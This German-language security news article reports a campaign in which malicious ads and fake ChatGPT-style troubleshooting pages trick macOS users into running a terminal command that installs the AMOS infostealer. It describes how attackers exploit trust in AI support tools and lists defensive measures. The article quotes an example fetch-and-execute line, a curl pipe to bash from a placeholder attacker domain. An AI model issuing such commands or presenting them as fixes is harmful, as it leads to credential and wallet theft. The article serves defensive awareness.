Eine neue Malware-Kampagne missbraucht das Vertrauen von Nutzern in KI-Supporttools und infiziert macOS-Geräte über gefälschte ChatGPT-Fehlerbehebungssitzungen mit dem AMOS-Infostealer.
Opfer, die nach einfachen Lösungen suchen – etwa zur Behebung von Tonproblemen –, werden über schädliche Google-Anzeigen auf eine überzeugende ChatGPT-ähnliche Oberfläche geleitet, die einen als Systemreparatur getarnten Terminalbefehl ausgibt.
Nachdem die Malware installiert war, „… wurden erfolgreich vertrauliche Daten aus dem System exfiltriert“, sagten die Kroll-Forscher.
Von der Suchanzeige zur Systemkompromittierung
Im Gegensatz zu herkömmlichen Phishing-Kampagnen, die auf gefälschte Installationsprogramme, E-Mail-Anhänge oder offensichtlich verdächtige Downloads setzen, ist dieser Angriff darauf ausgelegt, alltäglich und vertrauenswürdig zu wirken.
Opfer stoßen in Suchergebnissen oder Anzeigen auf schädliche Inhalte, die scheinbar legitime Anleitungen zur Fehlerbehebung anbieten.
Die Interaktion ahmt einen normalen Support-Austausch nach: Der Nutzer erklärt ein Problem, erhält eine klare und autoritative Antwort und wird angewiesen, einen einzigen Terminalbefehl auszuführen, um das Problem zu „beheben“. Dieser Vertrauensmoment löst die Kompromittierung aus.
Der von den Angreifern bereitgestellte Befehl folgt einem vertrauten Einzeiler-Muster, wie es häufig von Entwicklern und IT-Fachleuten verwendet wird:
curl -s https://attacker-example[.]com/installer.sh | bash
Auf den ersten Blick wirkt dies wie eine übliche Methode, Open-Source-Tools zu installieren oder schnelle Fehlerbehebungen anzuwenden.
Tatsächlich lädt die Pipeline sofort ein entferntes Shell-Skript herunter und führt es aus, ohne dem Nutzer die Möglichkeit zu geben, dessen Inhalt zu prüfen.
Dieses Verhalten entspricht direkt MITRE-ATT&CK-Techniken wie Benutzerausführung und Übertragung eingehender Tools, bei denen sich Angreifer auf legitime Systemprogramme stützen, um die Malware-Bereitstellung einzuleiten.
Nach der Ausführung installiert das Skript unbemerkt den AMOS-Infostealer, richtet Persistenzmechanismen ein, die Neustarts überdauern, und beginnt mit dem Abgreifen sensibler Daten wie Browser-Zugangsdaten, Cookies und Kryptowährungs-Wallets.
Da die Aktivitäten im Terminal stattfinden und integrierte macOS-Tools nutzen, lösen sie weder die üblichen Installationsabfragen noch Gatekeeper-Warnungen oder andere sichtbare Sicherheitsdialoge aus, sodass die Infektion weitgehend unbemerkt fortschreiten kann.
Die Kroll-Forscher weisen darauf hin, dass die Wirksamkeit der Kampagne durch die dahinterstehende Infrastruktur noch verstärkt wird.
Die schädlichen Anzeigen und Landingpages verwenden Domains und Branding, die legitimen Diensten stark ähneln, wodurch der Verdacht der Nutzer erheblich gesenkt und die Wahrscheinlichkeit erhöht wird, dass die Zielpersonen den bereitgestellten Anweisungen folgen.
Warum Social Engineering auf KI-Basis funktioniert
Diese Technik ist wirksam, weil sie eine zunehmend verbreitete Verhaltensweise ausnutzt: sich bei der schnellen, autoritativen Fehlerbehebung auf KI-Tools zu verlassen.
Indem der Köder über eine vollständig interaktive, ChatGPT-ähnliche Oberfläche statt über eine statische Phishing-Seite präsentiert wird, wirkt das Erlebnis auf die Nutzer vertraut und vertrauenswürdig.
Der Ablauf ähnelt stark legitimen Support-Interaktionen – ein Problem identifizieren, eine Diagnose erhalten und einen vorgeschlagenen Befehl ausführen –, senkt die Abwehr und fördert die Befolgung der Anweisungen.
Die Sichtbarkeit wird durch die Manipulation von Suchmaschinen mittels gesponserter Anzeigen zusätzlich erhöht, sodass die schädlichen Inhalte dort platziert werden, wo Nutzer am wahrscheinlichsten darauf stoßen.
Die Darstellung der Payload als routinemäßiger macOS-Reparaturbefehl fördert eine schnelle Ausführung, während das Fehlen herkömmlicher Downloads, Installationsdialoge oder Authentifizierungsabfragen Reibung beseitigt, die andernfalls Verdacht erregen könnte.
Zusammen bieten diese Elemente Angreifern einen äußerst zuverlässigen Zugang sowohl zu nicht verwalteten privaten Systemen als auch zu Unternehmensumgebungen mit BYOD-Geräten.
Risiken durch KI-gestütztes Social Engineering reduzieren
Social-Engineering-Angriffe über das Terminal werden zunehmend effektiver, da Nutzer immer vertrauter damit werden, von KI generierten Anleitungen zur Fehlerbehebung zu folgen.
Statt Software-Schwachstellen auszunutzen, stützen sich diese Kampagnen auf Vertrauen, routinemäßige Abläufe und legitime Systemtools, um unbemerkt eine Kompromittierung herbeizuführen.
Die Abwehr dieser Technik erfordert mehrschichtige Kontrollen, die die Ausführung riskanter Befehle begrenzen, Missbrauch frühzeitig erkennen und die Auswirkungen von Datendiebstahl bei Zugangsdaten reduzieren.
- Schulen Sie Mitarbeitende darin, terminalbasierte Anweisungen aus KI-Chats, Anzeigen oder unbekannten Websites zur Fehlerbehebung als hohes Risiko einzustufen und die Ausführung nicht verifizierter Befehle zu vermeiden.
- Setzen Sie unter macOS Endpoint-Erkennung und -Reaktion ein, die verdächtige Shell-Aktivitäten überwachen und blockieren kann, einschließlich cURL-Pipelines, der Bash-Ausführung und Persistenzversuchen.
- Beschränken Sie die Befehlsausführung, indem Sie Muster im Stil von curl | bash blockieren oder entsprechende Warnungen ausgeben, die Skriptsignierung erzwingen und die Shell-Nutzung auf zugelassene Nutzer und Geräte beschränken.
- Implementieren Sie DNS, Web- und Egress-Filter, um neu registrierte oder schädliche Domains zu blockieren und die Angriffsfläche durch Suchmaschinen- und anzeigenbasierte Bereitstellungsinfrastrukturen zu verringern.
- Stärken Sie den Schutz von Identität und Zugangsdaten, indem Sie phishing-resistente MFA durchsetzen, lokale Administratorzugriffe beschränken und von der browserbasierten Speicherung von Unternehmenszugangsdaten abraten.
- Kontinuierlich überwachen Sie auf Indicators of Compromise (IoCs), darunter ungewöhnliche ausgehende Verbindungen, Konfigurationsänderungen sowie Zugriffe auf Zugangsdaten oder Tokens, und testen Sie die Erkennungen durch regelmäßige Simulationen.
Zusammen helfen diese Maßnahmen Unternehmen, ihre Gefährdung durch terminalbasierte Angriffe zu verringern und gleichzeitig praktikable und effiziente Abläufe für Endnutzer aufrechtzuerhalten.
Angreifer machen sich das Vertrauen in KI zunutze
Diese Kampagne steht für eine breitere Veränderung der Taktiken von Angreifern: KI-ähnliche Oberflächen ersetzen herkömmliche Phishing-Seiten zunehmend als bevorzugten Bereitstellungsmechanismus.
Da Nutzer sich immer wohler damit fühlen, chatbasierte Tools zur Fehlerbehebung und Anleitung zu verwenden, können Angreifer diese Interaktionen zunehmend überzeugend nachahmen.
Die AMOS-Kampagne zeigt, wie ein einziger Copy-and-paste-Befehl – ausgeführt von einem Nutzer, der glaubt, legitimen KI-Ratschlägen zu folgen – ein macOS-System nahezu augenblicklich kompromittieren kann.
Da KI immer stärker in alltägliche Support- und Produktivitätsabläufe eingebettet wird, werden Angreifer dieses Vertrauen weiter ausnutzen, wodurch KI-markierte Köder zu einem wachsenden und anhaltenden Risiko werden, das Unternehmen in ihren Sicherheitsmodellen berücksichtigen müssen.
Da die Nachahmung von Personen durch KI immer realistischer wird, verlagert sich der Schwerpunkt der Abwehr auf die Erkennung manipulierter und synthetischer Inhalte.

